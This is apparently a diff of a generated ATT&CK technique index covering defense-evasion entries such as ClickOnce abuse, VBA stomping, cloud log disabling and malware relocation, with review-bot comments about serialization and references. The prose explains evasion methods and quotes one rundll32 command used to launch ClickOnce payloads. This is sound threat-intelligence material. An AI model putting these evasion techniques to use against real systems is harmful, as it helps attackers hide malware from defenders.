- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -10833,7 +10970,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -10867,7 +11003,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10894,8 +11030,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests: []
T1553.004:
@@ -10990,48 +11124,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests: []
T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
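Review bot: most of this hunk is key reordering rather than content: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted from the head of T1027.004 and the same keys reappear lower in the entry in the following hunks. Emitting keys in a fixed order from the generator would reduce this to the real changes, which are easy to miss here: the description now names `ilasm.exe` with a new `(Citation: ATTACK IQ)`, `Liran Ravich, CardinalOps` joins the contributors, and `x_mitre_deprecated: false` is added. The `ilasm.exe(Citation: ATTACK IQ)` spacing matches the existing `GCC/MinGW.(Citation: ...)` convention in the same sentence, so no change is needed there.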
@@ -11040,9 +11150,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
@@ -11054,12 +11169,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests: []
T1564.007:
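Review bot: `x_mitre_permissions_required: - User` is deleted here and, unlike every other key removed in the T1027.004 rewrite, is not re-added anywhere in the rebuilt entry. If upstream dropped it in version `1.1` that is fine, but it is the one real field loss in an otherwise reordering-only change and deserves a mention in the commit message; if it was lost by the generator, it should be restored. The new `ATTACK IQ` reference is correctly listed in `external_references` to match the citation introduced in the description, and `x_mitre_attack_spec_version` is bumped from `2.1.0` to `3.2.0` in line with the other entries.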
@@ -11107,7 +11245,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11133,12 +11271,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11228,7 +11364,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1127.001:
@@ -11286,12 +11421,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests: []
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -11333,10 +11467,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -11360,18 +11493,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
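Review bot: the rewritten T1578.005 description ends with a trailing space inside the quoted scalar (`Cloud Regions](https://attack.mitre.org/techniques/T1535). "`), which will carry through to any rendered output; trimming the value when serializing would avoid that. The scalar style also changes from the `|-` literal block to a double-quoted string with `\n\n` escapes, which is serialization churn, whereas the substantive change is the removal of the third paragraph on Azure subscription creation and subscription hijacking. That removal is consistent with the later hunk that drops the `Microsoft Subscription Hijacking 2022` and `Microsoft Peach Sandstorm 2023` references while keeping `Microsoft Azure Policy`, which the new text still cites, and with the version bump from `1.0` to `2.0`.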
@@ -11385,7 +11530,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -11397,20 +11542,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
@@ -11419,11 +11555,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11432,6 +11567,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -11441,6 +11577,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
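Review bot: unrelated to the contributor addition, the context lines show the `x_mitre_detection` string for T1562.008 split across lines around `StopLogging` and `DeleteTrail` (`for: StopLogging` / `and DeleteTrail` / `.(Citation: Stopping`), which looks like inline code markup stripped during generation and left behind as bare line breaks. It is pre-existing, but since this entry is being regenerated anyway, this is a good moment to normalize that text into a single line so the detection guidance reads correctly.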
@@ -11452,13 +11589,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
@@ -11503,9 +11640,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests: []
T1564.003:
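Review bot: `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` are not dropped from T1562.008 here but moved, reappearing near the top of the entry in the earlier hunks (after `phase_name` and after `x_mitre_is_subtechnique` respectively), so their values are unchanged and only `spec_version: '2.1'` is actually removed. This is the only entry in this diff where those two keys sit before `x_mitre_platforms` rather than after `object_marking_refs`; it confirms the generator is passing through upstream key order, and sorting keys on output would make entries uniform and keep future diffs down to real changes.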
@@ -11588,18 +11722,140 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests: []
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
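Review bot: the two Burke/CISA references added for T1127.002 carry Google Analytics session state in their URLs (the `?_gl=1*1jv89bf*_gcl_au*...&_ga=2.256219723...` tail on the paper and a second `_gl`/`_ga` pair on the slides) and spell the same author two ways (`William J. Burke IV` on the paper, `William Joseph Burke III` on the slides). The query strings are tracking tokens rather than part of the resource location, so the stable URLs end at `...-Operating-As-Intended-wp.pdf` and `...-Operating-As-Intended.pdf`, and the author name should be written one way. If this index is regenerated from the upstream ATT&CK STIX bundle, file the correction upstream instead of hand-editing it here, or it will be overwritten on the next regeneration.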
@@ -11632,10 +11888,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
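Review bot: T1556.009 drops `Azure AD` and `SaaS` from `x_mitre_platforms` and adds `Identity Provider`, with `x_mitre_version` bumped from `1.0` to `1.1`; the `Azure AD` to `Entra ID` wording change in the description above is the matching edit. Check that any index keyed by platform was regenerated from the same source bundle, otherwise this technique stays listed under a platform it no longer declares.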
@@ -11672,40 +11927,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
